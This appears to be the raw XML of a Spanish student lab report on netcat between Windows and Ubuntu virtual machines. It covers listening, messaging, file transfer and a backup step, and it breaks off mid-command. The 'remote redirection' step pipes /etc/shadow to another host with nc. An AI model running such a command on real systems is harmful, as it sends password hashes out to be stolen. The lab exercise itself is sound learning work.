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EEF8" w14:textId="2760D5E3" w:rsidR="005434F9" w:rsidRPr="005434F9" w:rsidRDefault="005434F9" w:rsidP="005434F9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982D72" w:rsidRPr="00982D72">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PARP202-Netcat</w:t>
      </w:r>
      <w:r w:rsidR="00662AB7">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>.DOCX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E4628F" w14:textId="77777777" w:rsidR="00E9084A" w:rsidRDefault="005434F9" w:rsidP="005434F9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9A5BFD8" w14:textId="7457211D" w:rsidR="005434F9" w:rsidRDefault="00965D53" w:rsidP="005434F9">
      <w:r>
        <w:t>Se trata de estudiar la herramienta netcat en diversos entornos, Windows y Linux.</w:t>
      </w:r>
      <w:r w:rsidR="000A5092">
        <w:br/>
        <w:t>Tras el estudio de la herramienta, deberán realizarse trans</w:t>
      </w:r>
      <w:r w:rsidR="00081AD4">
        <w:t>ferencias entre diversos sistemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BDAEA4" w14:textId="77777777" w:rsidR="005434F9" w:rsidRDefault="005434F9" w:rsidP="005434F9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05E19602" w14:textId="1D3CFE47" w:rsidR="005434F9" w:rsidRDefault="006C575A" w:rsidP="006C575A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Una máquina de Windows</w:t>
      </w:r>
      <w:r w:rsidR="00F87DC0">
        <w:t>, en mi caso utilizaré una que creé para una práctica anterior, con un Windows 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC0630D" w14:textId="38760E09" w:rsidR="006C575A" w:rsidRDefault="006C575A" w:rsidP="006C575A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una máquina </w:t>
      </w:r>
      <w:r w:rsidR="00F87DC0">
        <w:t>de Linux, en mi caso utilizaré una que creé para una práctica anterior, con un Ubuntu Desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DB5322" w14:textId="55D45C7D" w:rsidR="00F87DC0" w:rsidRDefault="00F87DC0" w:rsidP="006C575A">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4488B1" w14:textId="77777777" w:rsidR="005434F9" w:rsidRDefault="005434F9" w:rsidP="005434F9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32BFADF9" w14:textId="7A1DFA86" w:rsidR="00982D72" w:rsidRDefault="00F87DC0" w:rsidP="00982D72">
      <w:r>
        <w:t>El primer paso es iniciar ambas máquinas, tanto el Windows como el Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6920B404" w14:textId="7F844D48" w:rsidR="00F87DC0" w:rsidRDefault="00CD525C" w:rsidP="00982D72">
      <w:r>
        <w:t>Tras encender ambas máquinas, procedo a descargar e instalar el netcat en la máquina de Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA7861" w14:textId="3B5288FC" w:rsidR="00CD525C" w:rsidRDefault="00CD525C" w:rsidP="00982D72">
      <w:r>
        <w:t>El primer paso para descargar e instalar el netcat, es entrar al navegador (Edge)</w:t>
      </w:r>
      <w:r w:rsidR="00D10C69">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77413852" w14:textId="4851F3E9" w:rsidR="00D10C69" w:rsidRDefault="00D10C69" w:rsidP="00982D72">
      <w:r w:rsidRPr="00D10C69">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B0708DD" wp14:editId="44EABE45">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="2127406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6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7B75" w14:textId="0F1305DE" w:rsidR="00D10C69" w:rsidRDefault="00D10C69" w:rsidP="00982D72">
      <w:r>
        <w:t xml:space="preserve">Tras esto, entro en la </w:t>
      </w:r>
      <w:r w:rsidR="005C748D">
        <w:t>URL proporcionada en los documentos entregados por el profesor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C748D">
        <w:t>(</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00C7376D" w:rsidRPr="007364FC">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://joncraton.org/blog/46/netcat-for-windows</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C7376D">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00AB42B2">
        <w:t xml:space="preserve"> y descargo el netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064AB54F" w14:textId="5072201B" w:rsidR="00844FE5" w:rsidRDefault="00C7376D" w:rsidP="00982D72">
      <w:r w:rsidRPr="00C7376D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DF91CD1" wp14:editId="444293B5">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="10348370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37067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FE5" w:rsidRPr="00844FE5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37F6AF9D" wp14:editId="057CBB83">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="11945238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2383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A38" w14:textId="77777777" w:rsidR="00844FE5" w:rsidRDefault="00844FE5">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="678FBA6A" w14:textId="061E05D1" w:rsidR="00D747CA" w:rsidRDefault="00844FE5" w:rsidP="00982D72">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Tras descargar la herramienta, la descomprimo</w:t>
      </w:r>
      <w:r w:rsidR="00D747CA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333814D1" w14:textId="4A74395A" w:rsidR="00D747CA" w:rsidRDefault="00D747CA" w:rsidP="00982D72">
      <w:r w:rsidRPr="00D747CA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2788A7F0" wp14:editId="41D0A45E">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="70722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810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616" w:rsidRPr="00952616">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67C91785" wp14:editId="4258AC40">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="11635729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299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A21" w14:textId="36FD522C" w:rsidR="00952616" w:rsidRDefault="000D564A" w:rsidP="00982D72">
      <w:r>
        <w:t>Procedo a ejecutarla.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3304CFC0" w14:textId="2C1A2FD1" w:rsidR="000D564A" w:rsidRDefault="005A621E" w:rsidP="00982D72">
      <w:r w:rsidRPr="005A621E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C741D74" wp14:editId="71913B6F">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="6594697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728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F70C" w14:textId="3A44D1B0" w:rsidR="00BC5D43" w:rsidRDefault="0068380E" w:rsidP="00982D72">
      <w:r>
        <w:t xml:space="preserve">Tras instalar y ejecutar la herramienta en Windows, </w:t>
      </w:r>
      <w:r w:rsidR="00864EFF">
        <w:t>procedo a ejecutar el terminal en el Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475AFBCB" w14:textId="5AAF89C2" w:rsidR="00864EFF" w:rsidRDefault="00F772C2" w:rsidP="00982D72">
      <w:r w:rsidRPr="00F772C2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B44BF68" wp14:editId="41962A9B">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="174198159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159" name="Imagen 1" descr="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EB5" w14:textId="088BC2BD" w:rsidR="00F772C2" w:rsidRDefault="00447660" w:rsidP="00982D72">
      <w:r>
        <w:t>Tras iniciar</w:t>
      </w:r>
      <w:r w:rsidR="00F772C2">
        <w:t xml:space="preserve"> el terminal en el Linux, </w:t>
      </w:r>
      <w:r>
        <w:t>ejecuto en amb</w:t>
      </w:r>
      <w:r w:rsidR="00897ADC">
        <w:t xml:space="preserve">as máquinas el comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00897ADC">
        <w:t>ipconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00897ADC">
        <w:t xml:space="preserve"> (Windows) e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00897ADC">
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00897ADC">
        <w:t xml:space="preserve"> (Linux).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FB5DC3" w14:textId="0E9182D8" w:rsidR="00392F86" w:rsidRDefault="002702E9" w:rsidP="00982D72">
      <w:r w:rsidRPr="002702E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DEE8FAE" wp14:editId="7EB4BBC2">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="5761731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314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F86" w:rsidRPr="00392F86">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B568AB3" wp14:editId="4C130FC4">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="90844857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48574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34" w14:textId="77777777" w:rsidR="00392F86" w:rsidRDefault="00392F86">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABBD576" w14:textId="3F67096A" w:rsidR="00A85FDD" w:rsidRDefault="00FE349F" w:rsidP="00A85FDD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Tras </w:t>
      </w:r>
      <w:r w:rsidR="005D590A">
        <w:t>comprobar que están en la misma red, voy a comenzar a probar distintos comandos de netcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFFFF78" w14:textId="264322C7" w:rsidR="003E064B" w:rsidRDefault="003F7EA2" w:rsidP="00A85FDD">
      <w:r w:rsidRPr="003F7EA2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Primero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Netcat </w:t>
      </w:r>
      <w:r w:rsidR="006C4A0E">
        <w:t>como servidor</w:t>
      </w:r>
      <w:r w:rsidR="003A5C15">
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003A5C15">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003A5C15">
        <w:t xml:space="preserve"> -l -p 8080”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0351B33F" w14:textId="7C09A0C8" w:rsidR="003A5C15" w:rsidRDefault="00747DDD" w:rsidP="00A85FDD">
      <w:r w:rsidRPr="00747DDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="563E231B" wp14:editId="348D426B">
            <wp:extent cx="3200000" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="269617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7032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CDD" w:rsidRPr="008A1CDD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="131D8F45" wp14:editId="05ED4F58">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="12703351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515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EB4B" w14:textId="77EC9C60" w:rsidR="008A1CDD" w:rsidRDefault="008A1CDD" w:rsidP="00A85FDD">
      <w:r w:rsidRPr="003F7EA2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Segundo</w:t>
      </w:r>
      <w:r w:rsidR="002131AB">
        <w:t xml:space="preserve">: Netcat como mensajería instantánea. </w:t>
      </w:r>
      <w:r w:rsidR="00E841D9">
        <w:t xml:space="preserve">En el caso de Windows, el comando a poner es </w:t>
      </w:r>
      <w:r w:rsidR="00CA0470">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E841D9">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E841D9">
        <w:t xml:space="preserve"> -l -p 8080</w:t>
      </w:r>
      <w:r w:rsidR="00CA0470">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00E841D9">
        <w:t xml:space="preserve">, mientras que en el caso de Linux es </w:t>
      </w:r>
      <w:r w:rsidR="00CA0470">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA0470">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA0470">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E470FF">
        <w:t>192.168.126.129 8080”.</w:t>
      </w:r>
      <w:r w:rsidR="00607CB5">
        <w:t xml:space="preserve"> Tras lo cual he puesto en el Linux el mensaje “Hola” dirigido al Windows”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E93D4B0" w14:textId="1283BF8D" w:rsidR="0090292D" w:rsidRDefault="0090292D" w:rsidP="00A85FDD">
      <w:r w:rsidRPr="0090292D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BB6BF77" wp14:editId="231F79F4">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="15915233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3358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B5" w:rsidRPr="00607CB5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7735EFA9" wp14:editId="579094AA">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="7128697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69798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0B16" w14:textId="5FDDA714" w:rsidR="005E531A" w:rsidRDefault="00BF59D2" w:rsidP="005E531A">
      <w:r w:rsidRPr="003F7EA2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tercero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="008D6927">
        <w:t>Netcat como redirección remo</w:t>
      </w:r>
      <w:r w:rsidR="00797A78">
        <w:t xml:space="preserve">ta. </w:t>
      </w:r>
      <w:r w:rsidR="005E531A">
        <w:t>En el caso de Windows, el comando a poner es “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005E531A">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005E531A">
        <w:t xml:space="preserve"> -l -p 8080”, mientras que en el caso de Linux es “</w:t>
      </w:r>
      <w:r w:rsidR="002F376D">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F376D">
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F376D">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F376D">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F376D">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F376D">
        <w:t>shadow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F376D">
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005E531A">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005E531A">
        <w:t xml:space="preserve"> 192.168.126.129 8080”.</w:t>
      </w:r>
      <w:r w:rsidR="002F376D">
        <w:t xml:space="preserve"> Tras lo cual, el contenido de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F376D">
        <w:t>shadow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F376D">
        <w:t xml:space="preserve"> aparece en el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F376D">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F376D">
        <w:t xml:space="preserve"> de Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137A6B20" w14:textId="11D8C933" w:rsidR="000B2DB9" w:rsidRDefault="000B2DB9" w:rsidP="00A85FDD">
      <w:r w:rsidRPr="000B2DB9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43AC0634" wp14:editId="7A337EA0">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="69407889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8899" name="Imagen 1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B9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FDA8328" wp14:editId="7B97B732">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1311497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9746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7402" w14:textId="77777777" w:rsidR="000B2DB9" w:rsidRDefault="000B2DB9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="140CCDFC" w14:textId="4306FD5A" w:rsidR="00D31B6F" w:rsidRDefault="000B2DB9" w:rsidP="00A85FDD">
      <w:r w:rsidRPr="003F7EA2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cuarto</w:t>
      </w:r>
      <w:r>
        <w:t>: Uso de netcat para envío de ficheros.</w:t>
      </w:r>
      <w:r w:rsidR="00BA5A85">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00964C40">
        <w:t xml:space="preserve">En </w:t>
      </w:r>
      <w:r w:rsidR="005E4BEB">
        <w:t>este apartado de la práctica he tenido que crear dos archivos</w:t>
      </w:r>
      <w:r w:rsidR="00B269B2">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B269B2">
        <w:t>txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005E4BEB">
        <w:t xml:space="preserve">, uno en </w:t>
      </w:r>
      <w:r w:rsidR="00B269B2">
        <w:t>el Linux, llamado “</w:t>
      </w:r>
      <w:r w:rsidR="00BF2AAE">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00B269B2">
        <w:t>ola” y con el contenido escrito “Hola</w:t>
      </w:r>
      <w:r w:rsidR="00BF2AAE">
        <w:t xml:space="preserve"> buenas tardes”, y uno en Windows llamado “recibir”</w:t>
      </w:r>
      <w:r w:rsidR="00EA710B">
        <w:t xml:space="preserve"> el cual no cuenta con contenido alguno.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A54CB8D" w14:textId="06FD2043" w:rsidR="0071718F" w:rsidRDefault="00EA710B" w:rsidP="00A85FDD">
      <w:r>
        <w:t xml:space="preserve">Tras esto, </w:t>
      </w:r>
      <w:r w:rsidR="004011D3">
        <w:t xml:space="preserve">en </w:t>
      </w:r>
      <w:r w:rsidR="00394A4F">
        <w:t>Windows he ejecutado el comando “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00394A4F">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00394A4F">
        <w:t xml:space="preserve"> -l -p 2389 &gt; recibir.txt” y en Linux el comando “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00394A4F">
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F1205A">
        <w:t xml:space="preserve"> hola.txt | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F1205A">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F1205A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0071718F">
        <w:t>192.168.126.129 2389</w:t>
      </w:r>
      <w:r w:rsidR="00A81E92">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00924822">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122DF1D5" w14:textId="46782472" w:rsidR="00924822" w:rsidRDefault="00F8222C" w:rsidP="00A85FDD">
      <w:r w:rsidRPr="00F8222C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="585777E1" wp14:editId="0C888B43">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="136992093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20937" name="Imagen 1" descr="Imagen que contiene Rectángul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22C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="513C5313" wp14:editId="4236AC2D">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="111816534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5345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C4D" w14:textId="7CBC2356" w:rsidR="001B5739" w:rsidRDefault="00F8222C" w:rsidP="00A85FDD">
      <w:r>
        <w:t>Tras ejecutar estos comandos, el texto “Hola buenas tardes” del archivo que se encuentra en el Linux</w:t>
      </w:r>
      <w:r w:rsidR="009553E8">
        <w:t>, lo ha escrito en el archivo “recibir.txt” del Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAEDA32" w14:textId="2A4D187E" w:rsidR="009553E8" w:rsidRDefault="002F6FCC" w:rsidP="00A85FDD">
      <w:r w:rsidRPr="002F6FCC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79C35C35" wp14:editId="093DEA59">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="9223725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72573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FCC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="175E99CB" wp14:editId="6E8F0262">
            <wp:extent cx="3200068" cy="1800000"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="146298226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2268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32D" w14:textId="77777777" w:rsidR="007F63E4" w:rsidRDefault="007F63E4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02038DC6" w14:textId="06099967" w:rsidR="00B61D46" w:rsidRDefault="004461E1" w:rsidP="00A85FDD">
      <w:r w:rsidRPr="003F7EA2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Quinto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="000F697D">
        <w:t>Netcat</w:t>
      </w:r>
      <w:r w:rsidR="008D2D74">
        <w:t xml:space="preserve"> como agente de copias de seguridad. </w:t>
      </w:r>
      <w:r w:rsidR="00CB498C">
        <w:t>Para esta parte de la práctica he usado dos Linux, ya que al usar un Linux y un Windows la transferencia no me funcionaba</w:t>
      </w:r>
      <w:r w:rsidR="00284253">
        <w:t>. Para facilitar la diferenciación de los Linux, he llamado al primero UbuntuDISOP1</w:t>
      </w:r>
      <w:r w:rsidR="0055328F">
        <w:t xml:space="preserve"> (máquina creada para una práctica anterior) y a la segunda máquina la he nombrado </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F61D21">
        <w:t>javier</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F0224">
        <w:t xml:space="preserve"> (máquina que he creado para uso personal, pero la cual aún no he tenido tiempo de usar ni configurar)</w:t>
      </w:r>
      <w:r w:rsidR="00B61D46">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AB2624">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F0224">
        <w:t>Tras solu</w:t>
      </w:r>
      <w:r w:rsidR="00B61D46">
        <w:t>cionar este pequeño contratiempo he continuado con la práctica.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E122ED0" w14:textId="4FB964CC" w:rsidR="0063094A" w:rsidRDefault="008D2D74" w:rsidP="00A85FDD">
      <w:r>
        <w:t xml:space="preserve">El primer paso para esta parte de la práctica es crear un disco de pequeño tamaño en </w:t>
      </w:r>
      <w:r w:rsidR="00CB498C">
        <w:t xml:space="preserve">el primer </w:t>
      </w:r>
      <w:r>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="005168E5">
        <w:t xml:space="preserve"> (1GB)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AB2624">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD140C">
        <w:t>Para crear este disco, he tenido q</w:t>
      </w:r>
      <w:r w:rsidR="00F8131C">
        <w:t>ue entrar a la configuración de la máquina virtual desde el VMware y crear un nuevo disco, el cual he llamado “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F8131C">
        <w:t>Borrame</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F8131C">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00A66B45">
        <w:t xml:space="preserve"> y he tenido que reiniciar el Ubuntu para que este </w:t>
      </w:r>
      <w:r w:rsidR="002D6D78">
        <w:t>se actualizase y me mostrase el disco</w:t>
      </w:r>
      <w:r w:rsidR="00F8131C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F61D21">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002446AA">
        <w:t>Tras reiniciar la máquina, he formateado el disco.</w:t>
      </w:r>
      <w:r w:rsidR="00F61D21">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0063094A">
        <w:t>A continuación, he introducido tres archivos .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0063094A">
        <w:t>txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0063094A">
        <w:t xml:space="preserve"> en el disco.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADF94AF" w14:textId="5A899893" w:rsidR="002641DD" w:rsidRDefault="00531949" w:rsidP="00A85FDD">
      <w:r>
        <w:t xml:space="preserve">En </w:t>
      </w:r>
      <w:r w:rsidR="00B61D46">
        <w:t>el Linux UbuntuDISOP1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> he </w:t>
      </w:r>
      <w:r w:rsidR="002405F7">
        <w:t>introducido el comando “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C4606">
